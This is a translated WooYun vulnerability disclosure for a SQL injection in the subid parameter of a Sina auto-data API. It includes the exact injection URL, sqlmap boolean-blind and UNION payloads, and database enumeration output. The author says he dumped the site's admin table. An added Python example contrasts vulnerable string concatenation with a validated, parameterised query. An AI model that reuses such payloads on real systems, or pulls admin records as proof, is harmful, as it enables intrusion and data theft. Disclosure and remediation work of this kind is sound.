
Vulnerability summary

Defect ID: wooyun-2016-0187450

Title: SQL injection vulnerability on a Sina site

Vendor: 新浪 (Sina)

Author: 心云

Submitted: 2016-03-22 09:19

Fixed: 2016-05-06 12:10

Published: 2016-05-06 12:10

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2016-03-22: Details reported to the vendor; awaiting vendor handling
2016-03-22: Vendor confirmed; details disclosed to the vendor only
2016-04-01: Details disclosed to core white hats and domain experts
2016-04-11: Details disclosed to regular white hats
2016-04-21: Details disclosed to intern white hats
2016-05-06: Details disclosed to the public

Brief description:

Hoping for a front-page spot and a high rank.

Detailed description:

Injection point:

http://data.auto.sina.com.cn/car/api/car_detail/filter_car.php?callback=jQuery1720008847676683217287_1458496287365&oe=utf-8&subid=2027&_=1458496287525


The injectable parameter is subid.
Fed it to sqlmap:

Parameter: subid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: callback=jQuery1720008847676683217287_1458496287365&oe=utf-8&subid=2027 AND 2090=2090&_=1458496287525
Type: UNION query
Title: MySQL UNION query (17) - 6 columns
Payload: callback=jQuery1720008847676683217287_1458496287365&oe=utf-8&subid=2027 UNION ALL SELECT 17,17,17,17,17,CONCAT(0x7171717171,0x4c796f
---
[20:17:23] [INFO] testing MySQL
[20:17:23] [INFO] confirming MySQL
[20:17:25] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[20:17:25] [INFO] fetching database names
[20:17:25] [INFO] the SQL query used returns 3 entries
[20:17:25] [INFO] retrieved: information_schema
[20:17:26] [INFO] retrieved: dataauto
[20:17:26] [INFO] retrieved: test
available databases [3]:
[*] dataauto
[*] information_schema
[*] test


Proof of vulnerability:

Current user and database:

数据库.jpg


The current database has 466 tables:

466.jpg


Table details:

Database: dataauto
[466 tables]


I only dumped the admin table and did not dump the others; the impact is severe enough as it is:

admin.jpg

Fix recommendation:

1. Filter the input.
2. Hoping for a high rank, thanks.

Copyright notice: please credit the source when reposting: 心云@乌云
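To show what "filter the input" means for this endpoint, here is an added example (not code from the report or from the site): the string-concatenation pattern that the sqlmap result implies, beside a hardened version that validates subid as an integer and binds it as a query parameter. It uses Python with an in-memory SQLite table as a stand-in for the MySQL backend; the table name, columns and rows are constructed assumptions, and the injected conditions are the ones sqlmap reported above.

```python
import sqlite3

# Constructed sample rows; the real dataauto schema is not known from the report.
SAMPLE_ROWS = [(2027, "car A"), (2028, "car B"), (2090, "car C")]


def _connect():
    """In-memory SQLite stand-in for the MySQL backend behind filter_car.php."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE auto_car (subid INTEGER, name TEXT)")
    conn.executemany("INSERT INTO auto_car VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def filter_car_vulnerable(subid: str) -> list:
    """What the sqlmap output implies: the raw GET value lands in the WHERE clause.
    The result now depends on whatever condition the caller appends, which is the
    boolean-based blind signal sqlmap reported."""
    conn = _connect()
    rows = conn.execute("SELECT name FROM auto_car WHERE subid = " + subid).fetchall()
    return [r[0] for r in rows]


def is_valid_subid(subid: str) -> bool:
    """subid is a numeric id, so anything but a short integer literal is rejected."""
    return subid.isdigit() and len(subid) <= 10


def filter_car_fixed(subid: str) -> list:
    """Hardened: validate the type, then bind the value as a query parameter so the
    database never parses it as SQL."""
    if not is_valid_subid(subid):
        raise ValueError("subid must be a positive integer")
    conn = _connect()
    rows = conn.execute(
        "SELECT name FROM auto_car WHERE subid = ?", (int(subid),)
    ).fetchall()
    return [r[0] for r in rows]


if __name__ == "__main__":
    print(filter_car_vulnerable("2027 AND 2090=2090"))  # ['car A']: injected condition true
    print(filter_car_vulnerable("2027 AND 2090=2091"))  # []: injected condition false
    print(filter_car_fixed("2027"))                      # ['car A']
```

The difference in the two vulnerable results for the same subid is exactly the true/false oracle a blind injection relies on; the fixed version rejects such input before it reaches the database.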


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 6

Confirmed: 2016-03-22 12:10

Vendor reply:

Thank you for your attention to Sina security; the issue is being fixed.

Latest status:

None yet

